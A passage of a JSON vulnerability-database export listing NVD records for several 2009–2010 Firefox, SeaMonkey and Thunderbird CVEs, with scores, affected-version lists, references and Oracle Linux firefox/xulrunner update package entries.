"id": "CVE-2009-3988", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3988", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-19T13:36:49", "references": ["http://www.mandriva.com/security/advisories?name=MDVSA-2010:042", "https://bugzilla.mozilla.org/show_bug.cgi?id=455472", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html", "http://www.vupen.com/english/advisories/2010/0405", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "http://www.debian.org/security/2010/dsa-1999", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.ubuntu.com/usn/USN-896-1", "http://www.redhat.com/support/errata/RHSA-2010-0112.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56363", "http://www.ubuntu.com/usn/USN-895-1"], "description": "Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly support the application/octet-stream content type as a protection mechanism against execution of web script in certain circumstances involving SVG and the EMBED element, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via an embedded SVG document.", "edition": 3, "reporter": "NVD", "published": "2010-02-22T08:00:02", "title": "CVE-2010-0162", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:49", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10697", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10697"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0162"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10697", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10697"}], "modified": "2017-09-18T21:30:14", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:3.0:beta2", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:firefox:3.0:beta5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:firefox:3.0:alpha", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-0162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0162", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:36:49", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=467005", "https://bugzilla.mozilla.org/show_bug.cgi?id=534082", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:042", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56359", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html", "http://www.redhat.com/support/errata/RHSA-2010-0153.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=530880", "http://www.vupen.com/english/advisories/2010/0405", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "http://www.debian.org/security/2010/dsa-1999", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html", "http://www.redhat.com/support/errata/RHSA-2010-0113.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036132.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036097.html", "http://www.ubuntu.com/usn/USN-896-1", "https://bugzilla.mozilla.org/show_bug.cgi?id=527567", "http://www.redhat.com/support/errata/RHSA-2010-0112.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://www.ubuntu.com/usn/USN-895-1", "http://www.vupen.com/english/advisories/2010/0650", "https://bugzilla.mozilla.org/show_bug.cgi?id=501934", "https://bugzilla.mozilla.org/show_bug.cgi?id=528300", "https://bugzilla.mozilla.org/show_bug.cgi?id=528134", "http://www.redhat.com/support/errata/RHSA-2010-0154.html"], "description": "The browser engine in Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, Thunderbird before 3.0.2, and SeaMonkey before 2.0.3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to the nsBlockFrame::StealFrame function in layout/generic/nsBlockFrame.cpp, and unspecified other vectors.", "edition": 3, "reporter": "NVD", "published": "2010-02-22T08:00:02", "title": "CVE-2010-0159", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:49", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8485", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8485"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0159"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9590", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9590"}], "modified": "2017-09-18T21:30:14", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.0.17"], "id": "CVE-2010-0159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0159", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:36", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=526500", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56361", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:051", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:042", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html", "http://www.redhat.com/support/errata/RHSA-2010-0153.html", "http://www.vupen.com/english/advisories/2010/0405", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "http://www.debian.org/security/2010/dsa-1999", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html", "http://www.redhat.com/support/errata/RHSA-2010-0113.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036132.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036097.html", "http://www.ubuntu.com/usn/USN-896-1", "http://www.redhat.com/support/errata/RHSA-2010-0112.html", "http://www.ubuntu.com/usn/USN-895-1", "http://www.vupen.com/english/advisories/2010/0650", "http://www.securityfocus.com/archive/1/archive/1/509585/100/0/threaded", "http://www.redhat.com/support/errata/RHSA-2010-0154.html"], "description": "Use-after-free vulnerability in the HTML parser in Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, Thunderbird before 3.0.2, and SeaMonkey before 2.0.3 allows remote attackers to execute arbitrary code via unspecified method calls that attempt to access freed objects in low-memory situations.", "edition": 3, "reporter": "NVD", "published": "2010-02-22T08:00:01", "title": "CVE-2009-1571", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:36", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11227", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11227"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1571"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8615", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:8615"}], "modified": "2017-09-28T21:34:26", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:3.0:beta2", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:firefox:3.0:beta5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:firefox:3.0:alpha", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2009-1571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1571", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:36:49", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/56360", "http://www.zerodayinitiative.com/advisories/ZDI-10-046", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:042", "https://bugzilla.mozilla.org/show_bug.cgi?id=533000", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html", "http://www.vupen.com/english/advisories/2010/0405", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.debian.org/security/2010/dsa-1999", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=534051", "http://www.securityfocus.com/archive/1/archive/1/510533/100/0/threaded", "http://www.ubuntu.com/usn/USN-896-1", "https://bugzilla.mozilla.org/show_bug.cgi?id=531222", "http://www.redhat.com/support/errata/RHSA-2010-0112.html", "http://www.ubuntu.com/usn/USN-895-1"], "description": "The Web Worker functionality in Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly handle array data types for posted messages, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors.", "edition": 3, "reporter": "NVD", "published": "2010-02-22T08:00:02", "title": "CVE-2010-0160", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:49", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11166", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11166"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0160"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8465", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:8465"}], "modified": "2017-09-18T21:30:14", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0160", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:43:41", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.0.1.el5_4.ia64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.0.18-1.0.1.el5_4.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "x86_64", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "i386", "packageFilename": "firefox-3.0.18-1.0.1.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.0.18-1.0.1.el5_4", "arch": "ia64", "packageFilename": "firefox-3.0.18-1.0.1.el5_4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "src", "packageFilename": "firefox-3.0.18-1.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.0.1.el5_4.i386.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.0.1.el5_4.x86_64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "src", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.0.18-1.0.1.el5_4.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "x86_64", "packageFilename": "firefox-3.0.18-1.0.1.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.0.18-1.0.1.el4", "arch": "ia64", "packageFilename": "firefox-3.0.18-1.0.1.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.18-1.0.1.el5_4.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.18-1.0.1.el5_4.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1.0.1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-1.9.0.18-1.0.1.el5_4.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}], "description": "firefox:\n[3.0.18-1.0.1.el5_4]\n- Update firstrun and homepage URLs in specfile\n- Added patch oracle-firefox-branding.patch\n- Added firefox-oracle-default-prefs.js/firefox-oracle-default-bookmarks.html\n and removed the corresponding RedHat ones\n[3.0.18-1]\n- Update to 3.0.18\nxulrunner:\n[1.9.0.18-1.0.1.el5_4]\n- Added xulrunner-oracle-default-prefs.js and removed the corresponding\n RedHat one.\n[1.9.0.18-1]\n- Update to 1.9.0.18 ", "edition": 3, "reporter": "Oracle", "published": "2010-02-17T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0167", "CVE-2010-0162", "CVE-2010-0171", "CVE-2009-3988", "CVE-2010-0169"], "modified": "2010-02-17T00:00:00", "id": "ELSA-2010-0112", "href": "http://linux.oracle.com/errata/ELSA-2010-0112.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:17", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", 